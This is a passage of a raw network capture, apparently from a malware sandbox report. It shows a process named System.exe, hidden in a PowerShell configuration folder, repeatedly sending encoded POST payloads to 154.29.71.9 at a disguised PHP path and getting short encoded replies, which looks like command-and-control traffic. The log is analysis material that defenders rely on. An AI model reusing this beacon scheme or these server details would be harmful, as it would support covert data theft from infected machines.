                                                                                                    Jan 4, 2025 14:53:46.053736925 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:46.410748959 CET2600OUTData Raw: 59 51 58 51 5e 5e 5d 50 5b 59 5a 55 50 5b 5b 5b 56 57 54 46 52 50 52 58 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YQXQ^^]P[YZUP[[[VWTFRPRXU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;)%8)8Y?>'U3?,3*T"=/U"+:*>$%<Y/?"Y ']/(
                                                                                                    Jan 4, 2025 14:53:46.580801964 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:46.712202072 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    115192.168.2.450111154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:47.182833910 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:47.535782099 CET2600OUTData Raw: 5c 5b 5d 5f 5b 5a 58 51 5b 59 5a 55 50 59 5b 54 56 5d 54 46 52 50 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[]_[ZXQ[YZUPY[TV]TFRPR[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^8==Z%8:*><[?4$8/85>?U!+5)-'%#/:/"Y ']/
                                                                                                    Jan 4, 2025 14:53:47.714724064 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:47.849153996 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    116192.168.2.450120154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:47.976706028 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:48.332614899 CET2600OUTData Raw: 59 5a 58 5e 5b 5f 58 57 5b 59 5a 55 50 5c 5b 54 56 54 54 49 52 51 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZX^[_XW[YZUP\[TVTTIRQRYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:.>91(P*+R';+/#!63"8!W>=($3;:/"Y ']/4
                                                                                                    Jan 4, 2025 14:53:48.503065109 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:48.631953955 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    117192.168.2.450124154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:48.758260012 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:49.114002943 CET2600OUTData Raw: 59 5a 5d 5c 5e 5c 58 57 5b 59 5a 55 50 5a 5b 57 56 5c 54 41 52 5c 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZ]\^\XW[YZUPZ[WV\TAR\R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,>:1V)>++#V' ,3>U6 "9>$ ':?"Y ']/,


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    118192.168.2.450125154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:49.186311007 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:49.553085089 CET1876OUTData Raw: 5c 5a 58 5a 5b 5e 5d 51 5b 59 5a 55 50 5b 5b 5a 56 51 54 42 52 5a 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXZ[^]Q[YZUP[[ZVQTBRZRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8X&$8%)=(=;T$;#5=#W5;>>X(% $.?"Y ']/(
                                                                                                    Jan 4, 2025 14:53:49.712579966 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:49.843954086 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 58 26 07 32 1d 25 3d 33 0c 2e 12 25 50 2b 20 2e 09 2f 03 3b 04 28 14 38 06 2f 0d 3f 10 3f 2b 31 18 3d 08 2b 56 27 2f 2c 11 2a 36 20 51 03 12 24 07 32 5f 35 02 3d 33 0c 05 2d 3d 34 41 22 21 19 5a 27 2a 2e 58 36 03 29 17 24 2c 21 56 2a 2f 2a 0c 2e 00 2f 12 2f 20 2b 0a 3f 2f 23 55 0b 1f 25 11 30 32 27 09 25 5e 24 58 3c 33 3b 07 3f 04 09 1f 20 5c 38 5d 24 3d 2a 1d 30 0f 18 0e 27 0f 26 00 30 0d 35 5f 36 00 01 10 25 10 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"X&2%=3.%P+ ./;(8/??+1=+V'/,*6 Q$2_5=3-=4A"!Z'*.X6)$,!V*/*.// +?/#U%02'%^$X<3;? \8]$=*0'&05_6%.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    119192.168.2.450126154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:49.401365995 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:49.776504993 CET2600OUTData Raw: 59 5f 58 5f 5e 58 5d 53 5b 59 5a 55 50 5b 5b 55 56 51 54 49 52 5e 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y_X_^X]S[YZUP[[UVQTIR^R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^89&+2W>=?).,%+.31!=05^&)= % ."Y ']/(
                                                                                                    Jan 4, 2025 14:53:49.928044081 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:50.064059973 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    120192.168.2.450127154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:50.201262951 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:50.551646948 CET2600OUTData Raw: 59 50 5d 5f 5b 55 58 52 5b 59 5a 55 50 5c 5b 55 56 52 54 47 52 5c 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YP]_[UXR[YZUP\[UVRTGR\R[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,&2P)>+<.3W$ Y8- -#T!(>*(B&4./"Y ']/4
                                                                                                    Jan 4, 2025 14:53:50.743530035 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:50.874169111 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    121192.168.2.450128154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:51.071003914 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2592
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:51.426415920 CET2592OUTData Raw: 5c 5e 58 59 5b 5e 58 51 5b 59 5a 55 50 58 5b 53 56 50 54 49 52 5f 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \^XY[^XQ[YZUPX[SVPTIR_RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9;=!Z&;&=(Y(T'],Y80&T58!;:)1-"Y ']/4
                                                                                                    Jan 4, 2025 14:53:51.650032997 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:51.840229988 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    122192.168.2.450129154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:52.019217014 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:52.364574909 CET2600OUTData Raw: 59 5f 5d 5b 5e 5f 58 52 5b 59 5a 55 50 5e 5b 5a 56 51 54 46 52 5a 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y_][^_XR[YZUP^[ZVQTFRZR_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[/%;.U>(?+T0;/.32V6?Q#(5(=+%,Y-?"Y ']/<
                                                                                                    Jan 4, 2025 14:53:52.667819023 CET225INHTTP/1.1 100 Continue
                                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 34 20 4a 61 6e 20 32 30 32 35 20 31 33 3a 35 33 3a 35 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sat, 04 Jan 2025 13:53:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    123192.168.2.450130154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:52.791860104 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:53.145080090 CET2600OUTData Raw: 59 5e 58 51 5e 59 58 52 5b 59 5a 55 50 5b 5b 5a 56 52 54 45 52 51 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y^XQ^YXR[YZUP[[ZVRTERQR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X.-*&;"Q*=Y( $8_,!=/V585U>>&##9"Y ']/(
                                                                                                    Jan 4, 2025 14:53:53.309509039 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:53.438247919 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    124192.168.2.450131154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:53.570911884 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:53.926331997 CET2600OUTData Raw: 59 59 5d 5b 5e 5b 58 5d 5b 59 5a 55 50 59 5b 53 56 51 54 49 52 5c 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YY][^[X][YZUPY[SVQTIR\RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^,)^$8)+)-$'+(.#.U5858)Q>>?1$X-/"Y ']/
                                                                                                    Jan 4, 2025 14:53:54.110147953 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:54.239907980 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    125192.168.2.450132154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:54.367248058 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:54.723294973 CET2600OUTData Raw: 5c 5a 58 59 5b 5b 58 5c 5b 59 5a 55 50 5c 5b 52 56 55 54 43 52 5d 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXY[[X\[YZUP\[RVUTCR]R[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8"2;:T>$X([4$,; &P!>#6+9*= D29?"Y ']/4


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    126192.168.2.450133154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:54.854988098 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
